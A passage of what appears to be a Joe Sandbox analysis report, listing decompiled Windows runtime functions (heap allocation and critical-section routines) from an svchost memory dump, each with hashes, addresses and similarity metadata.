                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction ID: 923f4bce516d664e928d5a0970521e39773135ca439645c6f419fdd4d7e58625
                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction Fuzzy Hash: 96E0C235282314BBDB229E44CC00FA97B9AEF80BA0F104431FE089EA90C6719D91DAC8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030B41E8 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E030B41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x31008f0);
				_t5 = E0307D08C(__ebx, __edi, __esi);
				if( *0x31187ec == 0) {
					E0303EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x31187ec == 0) {
						 *0x31187f0 = 0x31187ec;
						 *0x31187ec = 0x31187ec;
						 *0x31187e8 = 0x31187e4;
						 *0x31187e4 = 0x31187e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L030B4248();
				}
				return E0307D0D1(_t5);
			}





                        0x030b41e8
                        0x030b41ea
                        0x030b41ef
                        0x030b41fb
                        0x030b4206
                        0x030b420b
                        0x030b4216
                        0x030b421d
                        0x030b4222
                        0x030b422c
                        0x030b4231
                        0x030b4231
                        0x030b4236
                        0x030b423d
                        0x030b423d
                        0x030b4247

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c90a9fbbdd14c169fe02f86f78278f2c06cb74ee80f9c1a29e00aed1a33a053
                        • Instruction ID: e22df79c0b1c68a79b36131baf828f7a585084d768eb485aaf71db798bd8d146
                        • Opcode Fuzzy Hash: 2c90a9fbbdd14c169fe02f86f78278f2c06cb74ee80f9c1a29e00aed1a33a053
                        • Instruction Fuzzy Hash: C8F0157A912734CFCBA4EFA9D6007D836B8FB8C311F40816AC1508B2C9C7744581DF25
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305A185 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0305A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x31167e4 >= 0xa) {
					if(_t5 < 0x3116800 || _t5 >= 0x3116900) {
						return L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E03040010(0x31167e0, _t5);
				}
			}





                        0x0305a190
                        0x0305a1a6
                        0x0305a1c2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0305a192
                        0x0305a192
                        0x0305a19f
                        0x0305a19f

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 42da376f8fe64d8a46beb4d7f1d3c778f2d08cd5040d10d9c1410320124664c9
                        • Instruction ID: 991f44e9561ccaa8bf82b509fd88200ab8a88a02e1d33cf94e172ff5bd004bee
                        • Opcode Fuzzy Hash: 42da376f8fe64d8a46beb4d7f1d3c778f2d08cd5040d10d9c1410320124664c9
                        • Instruction Fuzzy Hash: EFD02B726231081BC71EE31C8F14BA36216E7C8700F30092CFA031E590DB5188E0C11C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030516E0 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E030516E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E03051710(0x31167e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L03044620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                        0x030516e8
                        0x030516ef
                        0x030516f3
                        0x030516fe
                        0x00000000
                        0x03051700
                        0x0305170d
                        0x0305170d
                        0x030516f2
                        0x030516f2
                        0x030516f2
                        0x030516f2

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f1345aa66ee9ee790f091c6a6f146ee1430c830111c923a80a575e324a36dee
                        • Instruction ID: dc9343a2b6b2d55bad22d1e0385c5b969990ae95f20017900def69a9b1307031
                        • Opcode Fuzzy Hash: 2f1345aa66ee9ee790f091c6a6f146ee1430c830111c923a80a575e324a36dee
                        • Instruction Fuzzy Hash: 1AD0A77114320062DE2DDB15AC04B562291EBC0781F3C006CF9075D4C0CFA1CDA3E448
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030A53CA Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E030A53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0303EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                        0x030a53ca
                        0x030a53ce
                        0x030a53d9
                        0x030a53de
                        0x030a53e1
                        0x030a53e1
                        0x030a53e6
                        0x030a53f3
                        0x00000000
                        0x030a53f8
                        0x030a53fb

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction ID: 3530ff59f743335665f8ad1e2119012f369887b1e5b57745017e736b5cc86012
                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction Fuzzy Hash: B7E0EC76946B849FCF12DB99CA50F9EB7F9FBC5B40F190454A4485F661C674ED00CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0303AAB0 Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0303AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                        0x0303aab6
                        0x0303aabb
                        0x0308a442
                        0x00000000
                        0x0308a448
                        0x0308a454
                        0x0308a454
                        0x0303aac1
                        0x0303aac1
                        0x0303aac6
                        0x0303aac6

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction ID: 0706f4f8fb5ef4fb483a03319d1f3da5eaeeea5bd5c092ea34e93f34619430b8
                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction Fuzzy Hash: 63D0E935352D80CFDA56DB1DC554B1573E8FB45B44FC904D0E541CBB61E76DD944CA00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030535A1 Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E030535A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0303EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                        0x030535a1
                        0x030535a1
                        0x030535a5
                        0x030535ab
                        0x030535ab
                        0x030535b5
                        0x00000000
                        0x030535c1
                        0x030535b7

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction ID: 8d3b51a1c40f797224271e186af7c3de311372be9e6f4b4b3172a413af58daa0
                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction Fuzzy Hash: 79D0A73D40318099DB43EF10C1347AEF3B5BF40284F5C30D5A80305451C3354909C600
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0302DB40 Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0302DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L03044620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                        0x0302db4d
                        0x0302db54
                        0x0302db5f
                        0x0302db56
                        0x0302db56
                        0x0302db5c
                        0x0302db5c

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction ID: b57991ac1de1be39846e4ca3fac817f411b52e9faccdcb5cc3756bdd5727eb41
                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction Fuzzy Hash: 8BC08C70282B00AAEB22AF20CD01B407AA0BB40B01F8800A0B300DA0F0DBB8DD01E600
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030AA537 Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E030AA537(intOrPtr _a4, intOrPtr _a8) {

				return L03048E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                        0x030aa553

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction ID: 0ed9014b439f50b4f0f83b03d29e199d4f84678acbbd30fc9af39bc6b5552784
                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction Fuzzy Hash: CBC01236080248BBCB12AE82CC00F467B2AEB94B60F008420BA080A5608632EA70EA84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03043A1C Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E03043A1C(intOrPtr _a4) {
				void* _t5;

				return L03044620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                        0x03043a35

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction ID: 373e4a0092038d1202bae4401c7d618a831cc02bc057332175321f31e014f08b
                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction Fuzzy Hash: 1BC08C32080248BBC712AE42DC00F017B29E790B60F000020B6040A5608572ED60D588
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030536CC Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E030536CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                        0x030536d2
                        0x030536e8
                        0x030536d4
                        0x030536e5
                        0x030536e5

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction ID: ff7c7913ab63e448bb76c0e6af557b3ac777326645454e092e3dc06dc7ebd3ba
                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction Fuzzy Hash: 30C09BBD157540BBD755AF30CD51F567298F740A61F6C07E87221495F0D5699D00E504
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030376E2 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E030376E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                        0x030376e4
                        0x00000000
                        0x030376f8
                        0x030376fd

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction ID: 9d40f44d718ef2fc992b73d3790a8a66b80c99d5d868ef1d5c90bb87f5f20acc
                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction Fuzzy Hash: DAC08CF41832805AEB2AD708CE30B213698AB09E08F8C01ACEA012D4A2C368A802C208
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0302AD30 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0302AD30(intOrPtr _a4) {

				return L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                        0x0302ad49

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction ID: 104a2f71e5710cefb8e32fd09b51be0182f100311b7e66ead6f072022a48fd2f
                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction Fuzzy Hash: ABC08C32080248BBC712AA45CE00F027B29E790B60F000020F6040A6618A32E960D588
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03047D50 Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E03047D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                        0x03047d56
                        0x03047d5b
                        0x03047d60
                        0x03047d5d
                        0x03047d5d
                        0x03047d5d

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction ID: 5b7ecc4a6791c258caa44f54c6d8bc3ce5c29fa92c81dbb4e02c48f9b5bac98e
                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction Fuzzy Hash: 9BB092343129409FCE56DF28C080B1533F8BB44A40B8800E0E400CBA20D329E9008900
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03052ACB Relevance: .0, Instructions: 5COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E03052ACB() {
				void* _t5;

				return E0303EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                        0x03052adc

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction ID: 2789e13d54515fbfbee91dd23323bd1bacb50f98d7549b2d8fff11a110b75ca5
                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction Fuzzy Hash: 10B092328125408BCF02EB40C610B5A7335AB80650F05449090012B9208228AC01CA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030BFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E030BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0306CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E030B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E030B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                        0x030bfdda
                        0x030bfde2
                        0x030bfde5
                        0x030bfdec
                        0x030bfdfa
                        0x030bfdff
                        0x030bfe0a
                        0x030bfe0f
                        0x030bfe17
                        0x030bfe1e
                        0x030bfe19
                        0x030bfe19
                        0x030bfe19
                        0x030bfe20
                        0x030bfe21
                        0x030bfe22
                        0x030bfe25
                        0x030bfe40

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030BFDFA
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030BFE2B
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030BFE01
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                        • API String ID: 885266447-3903918235
                        • Opcode ID: eaed2c5dcfba6f0811355ea26703453c87a317aa6a98d5713f0431ced3bfe576
                        • Instruction ID: 2c8dbb98dff173bb36e67fe17ad79fce2d99a3e378047d466e3c814bb676ebc8
                        • Opcode Fuzzy Hash: eaed2c5dcfba6f0811355ea26703453c87a317aa6a98d5713f0431ced3bfe576
                        • Instruction Fuzzy Hash: AEF0C236241201BFE6219A45DC02FA7BB6AEB85730F140214F6285A1D1DA62B83086A4
                        Uniqueness

                        Uniqueness Score: -1.00%